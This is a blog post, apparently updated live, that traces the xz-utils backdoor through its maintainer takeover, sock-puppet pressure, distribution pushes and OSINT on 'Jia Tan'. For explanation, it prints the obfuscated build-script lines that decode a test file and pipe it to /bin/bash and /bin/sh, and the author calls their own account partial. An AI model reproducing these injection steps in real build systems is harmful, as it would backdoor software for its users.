Everything I Know About the Xz Backdoor

state: unstable
in: blog
date: 3/29/2024

😖 Unstable

Updating at the speed of light, blink once and a word could be gone! These nodes are eratic, unstable, dangerous, but that's why they are fun.

Please note: This is being updated in real time. The intent is to make sense of lots of simultaneous discoveries regarding this backdoor. last updated: 11:30 AM EST

Update: The GitHub page for xz has been suspended.

2021

JiaT75 (Jia Tan) creates their GitHub account.

The first commits they make are not to xz, but they are deeply suspicious. Specifically, they open a PR in libarchive: Added error text to warning when untaring with bsdtar. This commit does a little more than it says. It replaces safe_fprint with an unsafe variant, potentially introducing another vulnerability. The code was merged without any discussion, and ~~lives on to this day~~ (patched). libarchive should also be considered compromised until proven otherwise.

2022

In April 2022, Jia Tan submits a patch via a mailing list. The patch is irrelevant, but the events that follow are. A new persona – Jigar Kumar enters, and begins pressuring for this patch to be merged.

Soon after, Jigar Kumar begins pressuring Lasse Collin to add another maintainer to XZ. In the fallout, we learn a little bit about mental health in open source.

Three days after the emails pressuring Lasse Collin to add another maintainer, JiaT75 makes their first commit to xz: Tests: Created tests for hardware functions.. Since this commit, they become a regular contributor to xz (they are currently the second most active). It’s unclear exactly when they became trusted in this repository.

Jigar Kumar is never seen again.

Glyph ^{@glyph@mastodon.social}

@eb I really hope that this causes an industry-wide reckoning with the common practice of letting your entire goddamn product rest on the shoulders of one overworked person having a slow mental health crisis without financially or operationally supporting them whatsoever. I want everyone who has an open source dependency to read this message https://www.mail-archive.com/xz-devel@tukaani.org/msg00567.html

^{Mar 29, 2024, 20:43} ^{505 retoots}

2023

JiaT75 merges their first commit on Jan 7 2023¹, which gives us good indication into when they fully gain trust.

In March, the primary contact email in Google’s oss-fuzz is updated to be Jia’s, instead of Lasse Collin.

Testing infrastructure that will be used in this exploit is committed. Despite Lasse Collin being attributed as the author for this, Jia Tan committed it, and it was originally written by Hans Jansen in June:

Hans Jansen’s account was seemingly made specifically to create this pull request. There is very little activity before and after. They will later push for the compromised version of XZ to be included in Debian.

In July, a PR was opened in oss-fuzz to disable ifunc for fuzzing builds, due to issues introduced by the changes above. This appears to be deliberate to mask the malicious changes that will be introduced soon.

2024

A pull request for Google’s oss-fuzz is opened that changes the URL for the project from tukaani.org/xz/ to xz.tukaani.org/xz-utils/. tukaani.org is hosted at 5.44.245.25 in Finland, at this hosting company. The xz subdomain, meanwhile, points to GitHub pages. This furthers the amount of control Jia has over the project.

A commit containing the final steps required to execute this backdoor is added to the repository:

The discovery

An email is sent to the oss-security mailing list: backdoor in upstream xz/liblzma leading to ssh server compromise, announcing this discovery, and doing it’s best to explain the exploit chain.

AndresFreundTec ^{@AndresFreundTec@mastodon.social}

I was doing some micro-benchmarking at the time, needed to quiesce the system to reduce noise. Saw sshd processes were using a surprising amount of CPU, despite immediately failing because of wrong usernames etc. Profiled sshd, showing lots of cpu time in liblzma, with perf unable to attribute it to a symbol. Got suspicious. Recalled that I had seen an odd valgrind complaint in automated testing of postgres, a few weeks earlier, after package updates.

Really required a lot of coincidences.

^{Mar 29, 2024, 18:32} ^{619 retoots}

A gist has been published with a very good high level technical overview and a “what you need to know”

I understand this chain even less than the original author, but here is me half reciting, half making sense of what’s happening:

This isn't good yet, I'm still figuring it out

Code is added to the upstream tarballs that injects an obfuscated script from the files committed above to be “executed at the end of configure”. This code, in turn, “modifies $builddir/src/liblzma/Makefile to contain”

am__test = bad-3-corrupt_lzma2.xz
...
am__test_dir=$(top_srcdir)/tests/files/$(am__test)
...
sed rpath $(am__test_dir) | $(am__dist_setup) >/dev/null 2>&1

(you’ll notice this was the file added above) “which ends up as” (what ends up as?)

sed rpath ../../../tests/files/bad-3-corrupt_lzma2.xz | tr "	 \-_" " 	_\-" | xz -d | /bin/bash >/dev/null 2>&1;

The sed reportedly transforms into

####Hello####
#��Z�.hj�
eval `grep ^srcdir= config.status`
if test -f ../../config.status;then
eval `grep ^srcdir= ../../config.status`
srcdir="../../$srcdir"
fi
export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +724)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31265|tr "\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" "\0-\377")|xz -F raw --lzma1 -dc|/bin/sh
####World####

You’ll notice this script is piping one of these files attached in the above commits into a series of very very obfuscated head calls. And after deobfuscation of this script, it leads to a sh file attached in the email:

injected.txt

There are a number of conditions identified that are required for the process to continue:

Building with GCC and the GNU linker
Only x86-64 Linux
Running as part of a Debian or RPM package build

The final binary reportedly is used in some way to bypass sshd authentication checks.

A sudden push for inclusion

A request for the vulnerable version to be included in Debian is opened by Hans:

#1067708 - xz-utils: New upstream version available

This request was opened the same week Hans’ Debian GitLab account was created. The account created a few similar “update” requests in various low traffic repositories to build credibility, after asking for this one.

A number of other, suspicious, anonymous name+number accounts with little former activity also push for its inclusion, including misoeater91 and krygorin4545. krygorin4545’s PGP key was made 2 days before joining the discussion.

Also seeing this bug. Extra valgrind output causes some failed tests for me. Looks like the new version will resolve it. Would like this new version so I can continue work.

I noticed this last week and almost made a valgrind bug. Glad to see it being fixed.
Thanks Hans!

The Valgrind bugs mentioned were introduced by this malicious injection, as noted in the email to OSS-Security:

Subsequently the injected code (more about that below) caused valgrind errors and crashes in some configurations, due the stack layout differing from what the backdoor was expecting. These issues were attempted to be worked around in 5.6.1:

A pull request to a go library by a 1password employee is opened asking to upgrade the library to the vulnerable version, however, it was all unfortunate timing. 1Password reached out by email referring me to this comment, and everything seems to check out.

A fedora contributor states that Jia was pushing for its inclusion in Fedora as it contains “great new features”

Jia Tan also attempted to get it into Ubuntu days before the beta freeze.

A few hours after all this came out, GitHub suspended JiaT75’s account. Thanks? They also banned the repository, meaning people can no longer audit the changes made to it without resorting to mirrors. Immensely helpful, GitHub. They also suspended Lasse Collin’s account, which is completely disgraceful.

Lasse has begun reverting changes introduced by Jia, including one that added a sneaky period to disable the sandbox. They also have published a FAQ that begins to explain the situation: XZ Utils backdoor

OSINT

Various people have reached out to me regarding discoveries about the identity of Jia. Some of this has been incorporated in the timeline, but other stuff is “timeless” and so I’m putting it here:

IRC

I received an email from a Debian maintainer that clarified a few points, and provided new insight into the situation (I’d like to credit them, but I’ve asked for permission to do so).

It seems “Jia Tan” was present on the #tukaani IRC channel on Libera.chat (I’m not there), but /whois revealed past presence in that IRC network, and the connecting IP, and having left during Mar 29:

22:45 [libera] -!- jiatan [~jiatan@185.128.24.163]
22:45 [libera] -!-  was      : Jia Tan
22:45 [libera] -!-  hostname : 185.128.24.163
22:45 [libera] -!-  account  : jiatan
22:45 [libera] -!-  server   : tungsten.libera.chat [Fri Mar 29 14:47:40 2024]
22:45 [libera] -!- End of WHOWAS

I did a nmap on that IP after that /whois, and the results were a bit strange with tons of ports seemingly open. The IP is from Singapore, but I’d assume either a proxy or a hosted site or similar

Important notes on LinkedIn

I have received a few emails alerting me to a LinkedIn of somebody named Jia Tan². Their bio boasts of large-scale vulnerability management. They claim to live in California. Is this our man? The commits on JiaT75’s GitHub are set to +0800, which would not indicate presence in California. UTC-0800 would be California. Most of the commits were made between UTC 12-17, which is awfully early for California. In my opinion, there is no sufficient evidence that the LinkedIn being discussed is our man. I think identity theft is more likely, but I am of course open to more evidence.

Discoveries in the Git logs

I received an email from Minhu Wang who investigated the Git log, and found one instance where Jia’s username was different:

$ git shortlog --summary --numbered --email | grep grep jiat0218@gmail.com
273 Jia Tan <jiat0218@gmail.com>
2 jiat75 <jiat0218@gmail.com>
1 Jia Cheong Tan <jiat0218@gmail.com>

They found this particularly interesting as Cheong is a lot less common of a name. Make of that as you will.

👟 Footnotes

Thanks @joeyh@hachyderm.io ↩︎
I was also alerted to discussions of this on Gab, which should tell you what you need to know. ↩︎

You are the 207620th visitor to this page! I'm receiving $7.02 per week from 12 patrons, and my goal is $10.00. Feel free to contact me with any questions or comments :)